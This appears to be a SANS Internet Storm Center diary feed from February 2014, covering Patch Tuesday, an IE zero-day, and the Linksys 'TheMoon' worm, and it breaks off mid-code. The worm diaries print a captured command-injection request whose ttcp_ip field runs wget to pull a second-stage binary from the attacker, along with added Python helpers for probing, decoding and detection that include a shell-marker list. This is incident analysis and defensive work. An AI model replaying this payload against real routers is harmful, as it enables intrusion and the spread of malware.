Latest Alerts

SYM14-004 Symantec Endpoint Protection Management Vulnerabilities - http://www.symantec.com/business/support/index?page=content&id=TECH214866, (Fri, Feb 14th)

Thu, 02/13/2014 - 20:32

Chris Mohan --- Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

FireEye reports IE 10 zero-day being used in watering hole attack, (Fri, Feb 14th)

Thu, 02/13/2014 - 20:11

The good people of FireEye Labs posted on the discovery of an IE 10 zero-day being used in a watering hole attack on a breached server in the US [1].

FireEye are working with Microsoft, so details are fairly thin. To quote from their first short blog post:

"It’s a brand new zero-day that targets IE 10 users visiting the compromised website–a classic drive-by download attack. Upon successful exploitation, this zero-day attack will download a XOR encoded payload from a remote server, decode and execute it."

Those looking after IE 10 users may want to keep an eye on their proxy logs for the follow-on download (an XOR-encoded payload fetched from a remote server) as a potential indicator.

UPDATE

FireEye have provided a great deal of detail on the attack in a second blog post, which is well worth a read and gives plenty of the indicators of compromise to run through your logs and filters:

http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html

[1] http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html

Chris Mohan --- Internet Storm Center Handler on Duty


ISC StormCast for Friday, February 14th 2014 http://isc.sans.edu/podcastdetail.html?id=3845, (Fri, Feb 14th)

Thu, 02/13/2014 - 19:35

Scanning activity for /siemens/bootstrapping/JnlpBrowser/Development/, (Fri, Feb 14th)

Thu, 02/13/2014 - 17:04
One of our readers, Mike, wrote in with some unusual hits in his web logs for /siemens/bootstrapping/JnlpBrowser/Development/ (HTTP/1.1), which he thoughtfully shared. The first was a solitary scan on 12 February 2014, followed by three more scans on 13 February 2014. The scanning IP address 194.95.72.110 has the host name fb02itsscan.fh-muenster.de; a quick lookup shows a web site offering this hearty welcome: "Welcome to the University of Applied Sciences Münster". So potentially another academic "study" that scans the Internet. Does anyone have information on what they may be looking for, or whether this is attached to a legitimate study? Please write in and let us know.

Chris Mohan --- Internet Storm Center Handler on Duty


Linksys Worm "TheMoon" Summary: What we know so far, (Thu, Feb 13th)

Thu, 02/13/2014 - 10:37

I am writing this summary as the prior diaries about this topic became a bit difficult to parse. 

At this point, we are aware of a worm that is spreading among various models of Linksys routers. We do not have a definite list of routers that are vulnerable, but the following routers may be vulnerable depending on firmware version: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900

The worm will connect first to port 8080 (using SSL if necessary) to request the "/HNAP1/" URL. This returns an XML formatted list of router features and firmware versions. The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:

<ModelName>E2500</ModelName> <FirmwareVersion>1.0.07 build 1</FirmwareVersion>

(this is a sample from an E2500 router running firmware version 1.0.07 build 1)

Next, the worm sends an exploit to a vulnerable CGI script running on these routers. The request does not require authentication: the worm sends random "admin" credentials, but they are not checked by the script. Linksys (Belkin) is aware of this vulnerability.

This second request launches a simple shell script that requests the actual worm. The worm is about 2MB in size; the samples we have captured so far appear pretty much identical but for a random trailer at the end of the binary. The file is an ELF MIPS binary.

Once this code runs, the infected router scans for other victims. The worm includes a list of about 670 different networks (some /21, some /24). All appear to be linked to cable or DSL modem ISPs in various countries.

An infected router will also serve the binary on a random low port for new victims to download. This HTTP server is only opened for a short period of time, and for each target a new server on a different port is opened.

We do not know for sure if there is a command and control channel yet. But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm.

We call this a "worm" at this point, as all it appears to do is spread. This may be a "bot" if there is a functional command and control channel present.

Indicators of compromise:

- heavy outbound scanning on port 80 and 8080.
- inbound connection attempts to misc ports < 1024.
 

Detecting potentially vulnerable systems:

printf 'GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n' | nc routerip 8080

(Use printf rather than echo here: bash's built-in echo does not interpret the \r\n escapes unless you pass -e, so the request lines would never be terminated and the router would not answer.) If you get the XML HNAP output back, then you MAY be vulnerable.
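A scripted form of the same check, as an added example that is not part of the diary and not Linksys code: it builds the GET /HNAP1/ request with the CRLF line endings the one-liner needs, pulls <ModelName> and <FirmwareVersion> out of the reply, and matches the model against the list the diary gives above. The model list is the diary's; the sample reply is constructed around the two XML lines quoted in the diary and is not a real capture; the "potentially_affected" flag is only the diary's "MAY be vulnerable" triage, not a vulnerability test, and the live probe speaks plain HTTP only (the worm also tries SSL).

```python
"""HNAP fingerprint helper for the Linksys "TheMoon" triage.

Added example, not code from the ISC diary or from Linksys. Assumes the
router answers GET /HNAP1/ on port 8080 with XML containing <ModelName>
and <FirmwareVersion>, as the diary shows.
"""
import re
import socket

# Models the diary names as possibly vulnerable depending on firmware.
SUSPECT_MODELS = {
    "E4200", "E3200", "E3000", "E2500", "E2100L", "E2000",
    "E1550", "E1500", "E1200", "E1000", "E900",
}

# Constructed sample reply: only the two elements quoted in the diary matter,
# the surrounding <Response> wrapper is not the real HNAP envelope.
SAMPLE_HNAP_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n\r\n"
    "<Response><ModelName>E2500</ModelName>"
    "<FirmwareVersion>1.0.07 build 1</FirmwareVersion></Response>"
)

_MODEL_RE = re.compile(r"<ModelName>\s*([^<]+?)\s*</ModelName>")
_FIRMWARE_RE = re.compile(r"<FirmwareVersion>\s*([^<]+?)\s*</FirmwareVersion>")


def hnap_probe_request(host, port=8080):
    """Raw request bytes; the CRLF pairs are what the echo one-liner gets wrong."""
    return (
        "GET /HNAP1/ HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def parse_hnap_fingerprint(response_text):
    """Return (model, firmware) from an HNAP reply, or None if it is not one."""
    model = _MODEL_RE.search(response_text)
    firmware = _FIRMWARE_RE.search(response_text)
    if not model or not firmware:
        return None
    return model.group(1), firmware.group(1)


def triage(model, firmware):
    """Summarise a fingerprint. The caller still has to judge the firmware
    (the ISP report on this page notes E1200 2.0.06 appears immune)."""
    return {
        "model": model,
        "firmware": firmware,
        "potentially_affected": model in SUSPECT_MODELS,
    }


def probe(host, port=8080, timeout=3.0):
    """Live version of the nc check: returns triage() output or None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(hnap_probe_request(host, port))
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except OSError:
        return None
    fp = parse_hnap_fingerprint(b"".join(chunks).decode("utf-8", "replace"))
    return triage(*fp) if fp else None


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))          # python3 hnap_check.py routerip
    else:
        print(triage(*parse_hnap_fingerprint(SAMPLE_HNAP_RESPONSE)))
```

Run it with a router address to probe one device, or without arguments to see the triage of the constructed sample. Because the reply is matched on the two element names only, the parser does not care what the rest of the HNAP envelope looks like.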

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Linksys Worm ("TheMoon") Captured, (Thu, Feb 13th)

Thu, 02/13/2014 - 10:06

Assistance needed:

  • If you have a vulnerable device that is infected, we could use full packet captures from that device. I am still trying to find out more about the command and control channel (if it exists).
  • If you have experience reverse engineering MIPS malware, ask me for a sample (use the contact form).

One important update: This affects other Linksys routers as well. For example, we do have some routers connecting to the honeypot that identify themselves as E2500 (Firmware 1.0.03 build 4).

Finally our honeypot did capture something that looks like it is responsible for the scanning activity we see:

The initial request, as discussed earlier, is:

GET /HNAP1/ HTTP/1.1
Host: [ip of host]:8080

The next request is where it gets interesting:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 518

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63
%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f
%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74
%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63
%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20
%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e
%xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69
%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31

The Authorization header decodes to username "admin" and password "&i1*@U$6xvcG" (still trying to figure out the significance of this password).

The decoded version of this request:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`&StartEPI=1

So it looks like it will try to download a "second stage" from port 193 from the attacking router. The ".L26" file appears to be a lock file to prevent multiple exploitation. 
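Decoding that request programmatically, as an added example that is not code from the diary: the body below is the percent-encoded request body quoted above with the line-wrap whitespace removed, and the withheld source-IP octets are kept as the literal "%xx" placeholders the diary used (they decode to "%xx", not to digits). Percent-decoding each &-separated chunk and only then splitting on "=" is what the diary's "decoded version" amounts to. Because the attacker encoded "=" as %3d, a by-the-book form parser that splits on a literal "=" before decoding never sees a parameter named ttcp_ip at all, which matters if a WAF or IDS normalises the body that way; the strict_parse_names() helper shows that difference.

```python
"""Decode the captured Linksys exploit POST and flag the injected command.

Added example, not code from the ISC diary. CAPTURED_BODY and CAPTURED_AUTH
are copied from the request quoted in the diary; the "%xx" octets are the
diary's placeholders for the withheld source IP. The SHELL_MARKERS list is
an assumption about what should never appear in a router CGI form field.
"""
import base64
from urllib.parse import parse_qsl, unquote

CAPTURED_BODY = (
    "%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63"
    "%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f"
    "%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74"
    "%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63"
    "%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20"
    "%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e"
    "%xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69"
    "%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31"
)

CAPTURED_AUTH = "Basic YWRtaW46JmkxKkBVJDZ4dmNH"

# Shell syntax and download tooling that has no business in a form field.
SHELL_MARKERS = ("`", "$(", ";", "|", "&&", "wget ", "curl ", "/tmp")


def decode_form_body(body):
    """Percent-decode each &-separated chunk, then split on the first '='.

    This reproduces the diary's decoded view: it treats an encoded %3d as
    the name/value separator, which is how the injected ttcp_ip shows up.
    """
    pairs = {}
    for chunk in "".join(body.split()).split("&"):
        name, _, value = unquote(chunk).partition("=")
        pairs[name] = value
    return pairs


def strict_parse_names(body):
    """Parameter names a standard parser sees: it splits on a literal '='
    *before* decoding, so '%3d' never separates and 'ttcp_ip' is not a name."""
    return [name for name, _ in parse_qsl("".join(body.split()),
                                          keep_blank_values=True)]


def decode_basic_auth(header_value):
    """'Basic <base64>' -> (user, password)."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not HTTP Basic authentication")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def flag_injected_params(form):
    """Return [(name, value, markers_found)] for fields carrying shell syntax."""
    hits = []
    for name, value in form.items():
        found = [marker for marker in SHELL_MARKERS if marker in value]
        if found:
            hits.append((name, value, found))
    return hits


if __name__ == "__main__":
    form = decode_form_body(CAPTURED_BODY)
    print("credentials:", decode_basic_auth(CAPTURED_AUTH))
    print("strict parser sees:", strict_parse_names(CAPTURED_BODY))
    for name, value, markers in flag_injected_params(form):
        print(f"injected via {name}: {value!r} markers={markers}")
```

The flagged field is ttcp_ip, whose value starts with "-h `cd /tmp;...": the backtick command substitution is the whole exploit, and a detection rule that decodes the body and looks for backticks, "$(", or a download tool name inside any form field would have caught this request regardless of which CGI it was sent to.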

I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit.

The port appears to change but is always < 1024. The second stage binary's name is always three letters followed by a "random" extension.

 

Here are the MD5s of some of the binaries I retrieved so far. They are ELF binaries. If anybody would like to assist in reversing them, please contact me for a sample.

d9547024ace9d91037cbeee5161df33e  0dQ.png
a85e4a90a7b303155477ee1697995a43  Dsn.raw
88a5c5f9c5de5ba612ec96682d61c7bb  EXr.pdf
ef19de47b051cb01928cab1a4f3eaa0e  Osn.asc

file type: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

I am going to update this diary blow-by-blow as I get to reverse parts of the second stage.

  • The binary includes a set of hard coded netblocks (/24 and /21) which are likely the blocks it scans.
  • There are also hardcoded dyndns.org host names. Not sure yet what they are for (C&C?): azlan281.dyndns.org, littlefrog.dyndns.org, charinalg06.dyndns.org, xplunk.dyndns-home.com and more.
  • Just based on "strings", it looks like there is a command and control channel used to report back the status of the host.
  • A list of user agents:
    Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)
    Mozilla/2.0 (compatible; MSIE 3.0B; Win32)
    Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
    Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.0.3705)
    Mozilla/4.0 (compatible; MSIE 6.0; Win32) WebWasher 3.0
    Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]
    Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.4.14-xfs; X11; i686)
    Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9
    Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/xxx.x (KHTML like Gecko) Safari/12x.x
    Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7
    Opera/9.60 (Windows NT 5.1; U; de) Presto/2.1.1
    Opera/9.0 (Windows NT 5.1; U; en)
    Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686; U;) Gecko/20011224
    Opera/6.x (Linux 2.4.8-26mdk i686; U) [en]
    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3
    Mozilla/5.0 (X11; Linux i686; U;rv: 1.7.13) Gecko/20070322 Kazehakase/0.4.4.1
  • A list of server banners:
    Apache/2.2.9 (Fedora)
    Apache/1.3.3 (Unix) (Red Hat/Linux)
    Apache/1.3.23
    Microsoft-IIS/5.0
    nginx
    Microsoft-IIS/5.1
    Netscape-Enterprise/4.1
    Microsoft-IIS/6.0
    Apache/2.2.24 (Amazon)
    Sun-ONE-Web-Server/6.1
    Microsoft-IIS/7.5
    IBM_HTTP_Server
  • Extensions and media types used for the 2nd stage files:
    application/pdf .pdf
    image/png
    image/gif .gif
    image/jpeg .jpg
    image/bmp .bmp
    image/tiff .tif
    audio/ac3 .ac3
    audio/asc .asc
    audio/ogg .ogg
    audio/midi .mid
    audio/mpeg .mpg
    video/mpeg
    video/avi .avi
    video/raw .raw

The binary is linked against OpenSSL, so the C&C channel could use SSL.

The binary also includes a couple of images (thanks Peter for pointing that out). The creation date of the images is May 9th 2013. They appear to be logos identifying the author? There are a total of 5 PNG images: 3 smilies and 2 logos. I am including the larger logo below. There are a number of strings with references to "lunar", "moon" and "planets" that appear to be used as part of the C&C channel. The reference to "Lunar Industries" and the logo appear to be a reference to the movie "The Moon" http://www.imdb.com/title/tt1182345/

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute


ISC StormCast for Thursday, February 13th 2014 http://isc.sans.edu/podcastdetail.html?id=3842, (Thu, Feb 13th)

Wed, 02/12/2014 - 20:16

Suspected Mass Exploit Against Linksys E1000 / E1200 Routers, (Wed, Feb 12th)

Wed, 02/12/2014 - 06:35

Brett, who operates an ISP in Wyoming, notified us that he had a number of customers with compromised Linksys routers these last couple of days. The routers, once compromised, scan port 80 and 8080 as fast as they can (saturating the available bandwidth).

It is not clear which vulnerability is being exploited, but Brett eliminated weak passwords. E1200 routers with the latest firmware (2.0.06) appear to be immune against the exploit used. E1000 routers are end-of-life and don't appear to have an immune firmware available.

As indicators, look for E1000/1200 routers which scan IP addresses sequentially on port 80/8080. Some of the routers may have modified DNS settings to point to Google's DNS server (8.8.8.8 or 8.8.4.4). 
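One way to hunt for that indicator in flow or firewall logs, as an added example that is neither the ISP's nor ISC's code: it looks for a source that, within a short window, connects to many distinct hosts on 80/8080, mostly walking through addresses one at a time. The flow records are constructed ("ts src dst dport", one per line) and the window, target-count and sequential-ratio thresholds are assumptions to tune against your own NetFlow or firewall export.

```python
"""Spot routers that sweep port 80/8080 sequentially.

Added example, not code from the ISC diary or from Brett's ISP. Records
are constructed 'ts src dst dport' lines; thresholds are assumptions.
"""
import ipaddress
from collections import defaultdict

SCAN_PORTS = {80, 8080}
WINDOW_SECONDS = 60          # assumption: tune to your export interval
MIN_TARGETS = 50             # assumption: distinct hosts hit inside one window
MIN_SEQUENTIAL_RATIO = 0.8   # assumption: share of hits that are "next IP up"


def parse_flow(line):
    """Parse one record; dst becomes an int so adjacent addresses differ by 1."""
    ts, src, dst, dport = line.split()
    return int(ts), src, int(ipaddress.ip_address(dst)), int(dport)


def find_scanners(lines):
    """Return {src: summary} for sources whose 80/8080 connections in any
    WINDOW_SECONDS span reach MIN_TARGETS distinct hosts in address order."""
    by_src = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = parse_flow(line)
        if dport in SCAN_PORTS:
            by_src[src].append((ts, dst))

    hits = {}
    for src, events in by_src.items():
        events.sort()                       # by time, then destination
        times = [t for t, _ in events]
        dsts = [d for _, d in events]
        end = 0
        for start in range(len(events)):
            # Slide the window end forward; 'end' never moves backwards.
            while end < len(events) and times[end] - times[start] <= WINDOW_SECONDS:
                end += 1
            window = dsts[start:end]
            targets = len(set(window))
            if targets < MIN_TARGETS:
                continue
            adjacent = sum(1 for a, b in zip(window, window[1:]) if b - a == 1)
            ratio = adjacent / max(len(window) - 1, 1)
            if ratio < MIN_SEQUENTIAL_RATIO:
                continue
            best = hits.get(src)
            if best is None or targets > best["targets"]:
                hits[src] = {"targets": targets,
                             "sequential_ratio": round(ratio, 2),
                             "first_seen": times[start]}
    return hits


def _constructed_flows():
    """Constructed sample: one router sweeping 203.0.113.0/24 one host per
    second, alternating 80 and 8080, plus an ordinary client browsing."""
    lines = []
    for i in range(80):
        port = 80 if i % 2 == 0 else 8080
        lines.append(f"{1000 + i} 198.51.100.7 203.0.113.{i + 1} {port}")
    for i in range(12):
        lines.append(f"{1000 + 30 * i} 198.51.100.8 192.0.2.{(7 * i) % 40 + 1} 80")
    return lines


SAMPLE_FLOWS = _constructed_flows()

if __name__ == "__main__":
    for src, summary in find_scanners(SAMPLE_FLOWS).items():
        print(src, summary)
```

The sequential-ratio test is what separates a worm walking a /24 from a busy but legitimate host: the browsing client in the sample never reaches fifty targets in a window, and even if it did, its destinations would not be consecutive addresses.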

If you have any insight, please let us know.

Update: The initial request sent by the exploited routers, if they find port 80 or 8080 open, is GET /HNAP1/ . HNAP is a REST-based web service that can be used to administer these routers. It is possible that the exploited vulnerability is part of HNAP (it had problems in the past), or that HNAP is just used to fingerprint the router to select the right exploit to send.

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute


ISC StormCast for Wednesday, February 12th 2014 http://isc.sans.edu/podcastdetail.html?id=3839, (Wed, Feb 12th)

Wed, 02/12/2014 - 06:29

February 2014 Microsoft Patch Tuesday, (Tue, Feb 11th)

Wed, 02/12/2014 - 06:29

Overview of the February 2014 Microsoft patches and their status.

 

Columns: bulletin / title; affected component (and the bulletin it replaces); CVE(s); KB; known exploits; Microsoft rating(**); ISC rating(*) for clients and servers.

MS14-005  Information Disclosure Vulnerability in Microsoft XML Core Services
          Affected: Microsoft XML Core Services (replaces MS10-051)
          CVE: CVE-2014-0266
          KB: 2916036
          Known exploits: Yes
          Microsoft rating: Severity Important, Exploitability 3
          ISC rating: clients Important / servers Important

MS14-006  IPv6 Denial of Service
          Affected: TCP/IP Stack (IPv6) (replaces MS13-065)
          CVE: CVE-2014-0254
          KB: 2904659
          Known exploits: Yes (vuln. known)
          Microsoft rating: Severity Important, Exploitability 3
          ISC rating: clients Important / servers Important

MS14-007  Remote Code Execution in Direct2D
          Affected: Direct2D (replaces none)
          CVE: CVE-2014-0263
          KB: 2912390
          Known exploits: No
          Microsoft rating: Severity Critical, Exploitability 1
          ISC rating: clients Critical / servers Important

MS14-008  Remote Code Execution in Microsoft Forefront
          Affected: Microsoft Forefront (replaces none)
          CVE: CVE-2014-0294
          KB: 2927022
          Known exploits: No
          Microsoft rating: Severity Critical, Exploitability 1
          ISC rating: clients N/A / servers Critical

MS14-009  Elevation of Privilege Vulnerability in .Net Framework
          Affected: .Net Framework (replaces MS13-052, MS11-100)
          CVE: CVE-2014-0253, CVE-2014-0257, CVE-2014-0295
          KB: 2916607
          Known exploits: Yes
          Microsoft rating: Severity Important, Exploitability 1
          ISC rating: clients Important / servers Important

MS14-010  Cumulative Security Update for Internet Explorer
          Affected: Internet Explorer (replaces MS13-097)
          CVE: CVE-2014-0267, CVE-2014-0268, CVE-2014-0269, CVE-2014-0270, CVE-2014-0271, CVE-2014-0272, CVE-2014-0273, CVE-2014-0274, CVE-2014-0275, CVE-2014-0276, CVE-2014-0277, CVE-2014-0278, CVE-2014-0279, CVE-2014-0280, CVE-2014-0281, CVE-2014-0283, CVE-2014-0284, CVE-2014-0285, CVE-2014-0286, CVE-2014-0287, CVE-2014-0288, CVE-2014-0289, CVE-2014-0290, CVE-2014-0293
          KB: 2909921
          Known exploits: Yes (CVE-2014-0267)
          Microsoft rating: Severity Critical, Exploitability 1
          ISC rating: clients PATCH NOW! / servers Important

MS14-011  Remote Code Execution Vulnerability in VBScript Scripting
          Affected: VBScript (replaces MS10-022)
          CVE: CVE-2014-0271
          KB: 2928390
          Known exploits: No
          Microsoft rating: Severity Critical, Exploitability 1
          ISC rating: clients Critical / servers Critical

We will update issues on this page for about a week or so as they evolve. We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY.

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

 


Adobe February 2014 Patch Tuesday, (Tue, Feb 11th)

Tue, 02/11/2014 - 18:45

Adobe released one patch today: APSB14-06 [1]. It addresses a vulnerability in Shockwave Player and affects Windows and OS X. The current version is now 12.0.9.149. The update has a priority rating of "1", which Adobe uses for vulnerabilities that are being exploited in the wild or are at higher risk of being targeted, so treat it as an update for a vulnerability under active attack.

 

[1] http://helpx.adobe.com/security/products/shockwave/apsb14-06.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute


ISC StormCast for Tuesday, February 11th 2014 http://isc.sans.edu/podcastdetail.html?id=3836, (Tue, Feb 11th)

Mon, 02/10/2014 - 18:23

Isn't it About Time to Get Moving on Chip and PIN?, (Mon, Feb 10th)

Mon, 02/10/2014 - 09:50

I got to thinking about the 3 "big story" breaches that we've all been discussing over the last month or so.  Just adding things up, we're at a count of over 100 million cards and personal information disclosed.

Just thinking about it over the weekend, I realized two things:
1/ All these breaches affect the only region still using card-swipe only credit cards - the United States.
2/ The count of cards compromised is right around 1/3 the population of the United States

With this many cards compromised and needing replacement, isn't it time that the industry wakes up and smells the coffee? Everyone (yes everyone) else in the world has moved to Chip and PIN technology, which makes theft of credit cards much more difficult (though not impossible, looking at recent events in the UK).  These breaches illustrate (again) that the US staying on this old technology for cards has the effect of making theft of cards much easier in the US, focusing the attention of criminals on US cards.

If we're replacing that many cards, wouldn't RIGHT NOW be a really good time to issue 110 million bright, shiny new Chip and PIN credit cards for the folks who are the victims of these breaches?  I know that this would complicate things on the logistics side, but it's not new technology - this could certainly be arranged.  Even if the Chip / PIN technology isn't actually used (there are a boatload of machines that need replacing for one thing), it at least gets things moving in the right direction.

Please, share your thoughts on this in our comment form - am I off base?

===============
Rob VandenBrink
Metafore


A Tale of Two Admins (and no Change Control), (Mon, Feb 10th)

Mon, 02/10/2014 - 09:45

I have a client who's done the right thing: they've broken out their test environment from their production environment. The production environment is in a colocation facility and uses a different firewall. The test environment is in the office location, and shares the office subnet and the office firewall. So sort of the right thing; they're moving in the right direction, though I would have given the test lab its own firewalled DMZ subnet.

About two years ago, one of the server admins asked the office firewall administrator to open port 3389 (RDP) to a test box, so that they could continue their build at home.  Not a great solution - I would have told him to VPN in and do it without changing the firewall - but it was done, the build got done and life moved on.

Unfortunately, the firewall change was not documented, was not remembered and was not backed out.

Fast forward 2 years. The two folks from 2 years back have both moved on to other positions and/or companies, and a new server admin is building a new Hyper-V server in the test environment. They're just about to deploy to production when he notices RDP connections to it from our friends in China. Yes, that undocumented change had come home to roost!

So, after we did the post mortem, what did they learn?

  • There's no fixing a compromised hypervisor: NFO (Nuke From Orbit), i.e. repartition the RAID array and start over, is always the best advice.
  • Hypervisors don't need a GUI; they shouldn't be RDP'ing into that box for admin in the first place.
  • DOCUMENT ALL FIREWALL CHANGES. HAVE A CHANGE CONTROL PROCESS. Happily, they've got a formal change control process now. On the firewall, there's an assessment step on all changes, to decide if the requested change is a good idea in the first place (open RDP was a singularly BAD idea).
  • Finally, they now run a basic NMAP scan (all addresses in the range, all ports) of the office environment from the colo, and the results are run through diff, comparing them against yesterday's results. This client is lucky in this regard because they have 2 separate locations that can scan each other, but in a more typical situation the folks responsible for security might do this from their laptop, scanning from home after work or before driving in each day.
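What that daily diff looks like in practice, as an added example that is neither the client's script nor nmap's own tooling: it reads nmap's greppable output (-oG), keeps only open ports per host, and reports what opened or closed between two runs, so a newly exposed RDP port stands out instead of being buried in a full port list. The scans would be produced with something like `nmap -p- -oG scan-$(date +%F).gnmap 192.0.2.0/24`; the two result files below are constructed, not real scan output.

```python
"""Diff two nmap -oG runs and report ports that opened or closed.

Added example, not the client's script. YESTERDAY and TODAY are constructed
greppable-output samples in the format nmap -oG writes (tab-separated
fields, 'Ports:' entries as port/state/proto/owner/service/rpc/version/).
"""
import re

YESTERDAY = """\
# Nmap 6.40 scan initiated Mon Feb 10 06:00:01 2014 as: nmap -p- -oG yesterday.gnmap 192.0.2.0/24
Host: 192.0.2.1 ()\tPorts: 443/open/tcp//https///\tIgnored State: closed (65534)
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: filtered (65533)
# Nmap done at Mon Feb 10 06:30:13 2014 -- 256 IP addresses (2 hosts up) scanned in 1812.33 seconds
"""

TODAY = """\
# Nmap 6.40 scan initiated Tue Feb 11 06:00:01 2014 as: nmap -p- -oG today.gnmap 192.0.2.0/24
Host: 192.0.2.1 ()\tPorts: 443/open/tcp//https///\tIgnored State: closed (65534)
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 3389/open/tcp//ms-wbt-server///\tIgnored State: filtered (65533)
Host: 192.0.2.23 ()\tPorts: 32764/open/tcp//unknown///\tIgnored State: closed (65534)
# Nmap done at Tue Feb 11 06:29:51 2014 -- 256 IP addresses (3 hosts up) scanned in 1790.02 seconds
"""

_HOST_RE = re.compile(r"^Host:\s+(\S+)")


def parse_gnmap(text):
    """-> {ip: {(port, proto): service}} containing open ports only."""
    open_ports = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        ip = _HOST_RE.match(line).group(1)
        entry = open_ports.setdefault(ip, {})
        for field in line.split("\t"):
            if not field.startswith("Ports:"):
                continue
            for port_spec in field[len("Ports:"):].split(","):
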